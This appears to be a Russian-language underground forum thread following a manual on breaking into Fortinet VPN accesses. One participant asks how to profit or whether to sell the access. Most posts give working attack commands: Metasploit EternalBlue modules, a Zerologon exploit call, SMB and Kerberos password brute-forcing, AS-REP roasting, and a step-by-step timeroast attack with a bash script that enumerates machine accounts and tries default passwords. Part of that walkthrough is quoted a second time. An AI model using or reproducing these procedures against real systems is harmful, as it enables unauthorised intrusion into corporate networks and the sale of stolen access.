Мануал/Книга Пентест Forti ВПН доступов. Еще один МАНУАЛ для новичков

[US_ER_01]

По окончании database not connected - это значит, что резульатов нет или чаво?

 

[weakem]

По окончании database not connected - это значит, что резульатов нет или чаво?

это значит ты дбне включил, и у тебя не сохранились то что найдено

 

[la-of-sh]

По окончании database not connected - это значит, что резульатов нет или чаво?

Перед запуском msfconsole запусти БД
systemctl start postgresql
msfdb init
msfconsole

 

[Artisan]

Привет, а как от туда забрать доллеры? Продать доступы?

 

[darkside112]

Всем привет. Делал все как в мануале, установил виртуалку, но почему то нет у меня консоли, подскажите что делаю не так?

 

[la-of-sh]

Всем привет. Делал все как в мануале, установил виртуалку, но почему то нет у меня консоли, подскажите что делаю не так?

Привет. Попробуй через virtmanager -> open
Лучше второй сервер сделать понадежнее, на форуме есть очень хорошие мануалы

 

[MrSpam]

Подскажите пол милиона комбинаций на 1 хост это нормально или нужно думать как уменьшать кол-во ?

 

[la-of-sh]

Что еще можно протестировать БЕЗ КРЕДОВ:
- смотрим сабы и что есть в сети
nxc smb 192.168.1.1/24
- ms17
nmap -v --open -p 445 192.168.1.1/24 --script smb-vuln-ms08-067,smb-vuln-ms17-010 -oA ./ms17
#проверяем оба варианта msfconsole
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_psexec
- zerologon
cve-2020-1472-exploit.py -t 192.168.1.1 -n NetBIOS
- Mssql\mysql на брут
nmap --open -Pn -n -p 1433 -iL 192.168.1.1/24 -oA mssql
nmap --open -Pn -n -p 3306 -iL 192.168.1.1/24 -oA mysql
- скрины веба
nmap -Pn -n -p 80,8080 -iL 192.168.1.1/24 -oA web
webscreenshot -i 443.txt -o ./web
- шары
nxc smb 192.168.1.1/24 -u '' -p '' --shares
- брут
./kerbrute userenum ./usernames.txt --dc 192.168.1.1 -d domain.local -o users.txt
nxc smb 192.168.1.1 -u users.txt -p passes.txt
- asreproast
GetNPUsers.py domain.local/ -usersfile ./users.txt -no-pass -dc-ip 192.168.1.1
- другие сервисы, линуксы, timeroast, exchange, esxi, sipы и т.д.

 

[la-of-sh]

АТАКА timeroast(без кредов)

GitHub - bvcyber/Timeroast: Timeroasting scripts by Tom Tervoort

Timeroasting scripts by Tom Tervoort. Contribute to bvcyber/Timeroast development by creating an account on GitHub.

github.com

#Проверка если отработает
rpcclient -U '%' 192.168.1.1 -c enumdomusers


1. ntp hashes and rid.txt
timeroast.py 192.168.1.1 | tee ntp-hashes.txt


2. создаем rid.txt
grep ":" ntp-hashes.txt | grep -o "^[^:]*" > rid.txt ; wc -l rid.txt


3. получаем domain sid
rpcclient -U '%' 192.168.1.1 -c lsaquery

----------------
#меняем ip и sid
./machine.sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/bin/bash

RID_FILE="rid.txt"

if [ ! -f "$RID_FILE" ]; then
echo "Error: File '$RID_FILE' not found."
exit 1
fi

while IFS= read -r rid; do
if ! [[ "$rid" =~ ^[0-9]+$ ]]; then
echo "Skipping invalid RID: $rid"
continue # Skip to the next RID if it's not a number
fi

rpcclient -U '%' 192.168.1.1 -c "lookupsids sssssiiiiiiiiid-$rid" 2>&1 | grep -v unknown | grep '\$ ('

sleep $((1+RANDOM % 2))
done < "$RID_FILE"

echo "Script completed."
exit 0

----------------

4. ./machine.sh |tee machine_accs.txt

grep "name:" machine_accs.txt | cut -d':' -f2- | sed 's/^ *//' > mac
sed 's/$/$/' mac > mu
awk '{print tolower($0)}' < mac > mpass
wc -l mu mpass

5. brute
nxc smb 192.168.1.1 -u mu -p mpass --no-bruteforce | tee mac_brute.txt

#Еще можно тестировать стандартные пассы Password1 и т.д.

 

[kn1ght]

It's helpful, thank you.

 

[Klordane]

может быть кому-то будет полезно, новичкам в первую очередь, есть такой журнал hackercool, там в основном практика, разбор cve, prvesc и т.д.

Скачать

 

[Mermix]

If you have permission, can I create it as a PDF book and share it under this topic?

 

[la-of-sh]

If you have permission, can I create it as a PDF book and share it under this topic?

+

 

[wav]

АТАКА timeroast(без кредов)

GitHub - bvcyber/Timeroast: Timeroasting scripts by Tom Tervoort

Timeroasting scripts by Tom Tervoort. Contribute to bvcyber/Timeroast development by creating an account on GitHub.

github.com

#Проверка если отработает
rpcclient -U '%' 192.168.1.1 -c enumdomusers


1. ntp hashes and rid.txt
timeroast.py 192.168.1.1 | tee ntp-hashes.txt


2. создаем rid.txt
grep ":" ntp-hashes.txt | grep -o "^[^:]*" > rid.txt ; wc -l rid.txt


3. получаем domain sid
rpcclient -U '%' 192.168.1.1 -c lsaquery

----------------
#меняем ip и sid
./machine.sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



----------------

4. ./machine.sh |tee machine_accs.txt

grep "name:" machine_accs.txt | cut -d':' -f2- | sed 's/^ *//' > mac
sed 's/$/$/' mac > mu
awk '{print tolower($0)}' < mac > mpass
wc -l mu mpass

5. brute
nxc smb 192.168.1.1 -u mu -p mpass --no-bruteforce | tee mac_brute.txt

#Еще можно тестировать стандартные пассы Password1 и т.д.

rpcclient в состав чего он входит ? impacket тютю.

 

[la-of-sh]

rpcclient в состав чего он входит ? impacket тютю.

Пакет samba, на дебиан устанавливается: sudo apt-get install samba